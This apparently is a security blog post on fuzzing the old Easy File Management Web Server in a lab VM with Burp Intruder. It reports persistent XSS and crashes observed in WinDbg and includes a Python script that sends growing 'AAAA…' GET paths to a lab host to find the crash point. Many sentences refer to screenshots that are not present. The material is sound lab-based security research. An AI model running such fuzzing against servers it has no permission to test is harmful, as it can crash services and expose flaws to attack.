Saturday, 29 October 2016

HTTP Server fuzzing with Burp

A while ago I was working on an HTTP server fuzzer written in Python. I was wondering whether I could get similar results using only the Burp proxy. Example results are below.

For testing purposes I decided to install an old HTTP server called “Easy File Management Web Server”. You can find it here or here. As a ‘lab environment’ I prepared a WinXP SP3 machine on VirtualBox (with all the other tools I’ll need, for example WinDbg). The version of the target software I used was 5.3:

The server is ready, so we can start Burp and configure our browser to connect through it as a proxy. With the environment prepared, we can now start our “fuzzing”:

As input I used 2 lists: the first one covered the bugs I usually look for during normal black-box pentests; the second one was prepared for basic fuzzing purposes, so I created a TXT file with multiple lines of increasing length, each containing “AAAA…” strings (as a first case). An example of an attack is below:

“Easy File Management Web Server” is attached to WinDbg, so we can observe the results in the “Server Logs” window. After a while I got the first results from the first payload list – persistent XSS:

Another request also seems to be vulnerable:

Below are the results of the attack:

Ok, so basically: fuzzing in Burp is also possible. ;) A few results from the 2nd list (“AAAA…”) you will find below. I used a GET request to send multiple “A” characters to the application. WinDbg presented results like those on the screen below:
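The second payload list and the Intruder loop described above can be reproduced without Burp in a few lines of Python. The block below is an added example, not the post's own fuzzer and not code from the Easy File Management Web Server project: it generates the variable-length “AAAA…” list in the one-payload-per-line TXT format that Burp Intruder loads, and optionally sends each payload in the path of a GET request to a server running in your own lab, recording when the listener stops answering (which is the point at which you would look at WinDbg). The lengths, host and port are constructed placeholder values, and classifying a refused connection as “listener gone” is an assumption of this example, not something the post states.

```python
import socket
from typing import Dict, List, Optional

# Payload lengths for the "AAAA..." list. These are constructed values; the
# post shows its actual lengths only in screenshots.
DEFAULT_LENGTHS = [64, 256, 1024, 4096, 8192]


def make_length_payloads(char: str = "A", lengths: Optional[List[int]] = None) -> List[str]:
    """Build one payload per requested length, e.g. 'A' * 1024."""
    lengths = DEFAULT_LENGTHS if lengths is None else lengths
    return [char * n for n in lengths]


def write_payload_file(path: str, payloads: List[str]) -> int:
    """Write one payload per line, the plain TXT layout Burp Intruder reads.

    Returns the number of lines written so callers can sanity-check the file.
    """
    with open(path, "w", encoding="ascii") as fh:
        for payload in payloads:
            fh.write(payload + "\n")
    return len(payloads)


def build_get_request(host: str, path: str) -> bytes:
    """Minimal HTTP/1.1 GET with the payload placed in the request path."""
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Connection: close\r\n\r\n"
    ).encode("ascii")


def probe(host: str, port: int, payloads: List[str], timeout: float = 3.0) -> Dict[int, str]:
    """Send each payload in the URL path and classify the server's reaction.

    Result per payload length is one of:
      "response"    - server answered with some bytes
      "empty-close" - connection accepted but closed without data
      "timeout"     - no answer within `timeout` seconds
      "refused"     - nobody is listening any more (assumed: the process died)
    Probing stops at the first refused connection, since every later payload
    would be reported as refused as well.
    """
    results: Dict[int, str] = {}
    for payload in payloads:
        request = build_get_request(host, "/" + payload)
        try:
            with socket.create_connection((host, port), timeout=timeout) as sock:
                sock.sendall(request)
                data = sock.recv(512)
            results[len(payload)] = "response" if data else "empty-close"
        except ConnectionRefusedError:
            results[len(payload)] = "refused"
            break
        except socket.timeout:
            results[len(payload)] = "timeout"
    return results


if __name__ == "__main__":
    # Placeholder lab target; replace with the VM running the server under test.
    LAB_HOST, LAB_PORT = "192.0.2.10", 80
    payloads = make_length_payloads()
    print("payload lines written:", write_payload_file("lengths.txt", payloads))
    for length, outcome in probe(LAB_HOST, LAB_PORT, payloads).items():
        print(f"len={length:>6}  {outcome}")
```

The generated `lengths.txt` can be loaded straight into Intruder as a simple list, so the same payloads drive both the Burp run and the scripted run; the `probe` loop only tells you at which length the server stopped responding, and the debugger attached to the server process is still where you see what actually happened.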

Another request/response pair looks like this:

And the results of the request:

A new result. Ok. I decided to observe this behaviour a little more and changed the payload length again:

Changing the length again gives new results:

Below is a screen from Burp with the requests; you can see the different lengths for each request:

From the ASM code we can see that there is no comparison between those 2 registers:

The base request I modified to make this work is presented on the screen below:

The post will probably be continued, but for now - maybe you will find it useful ;)
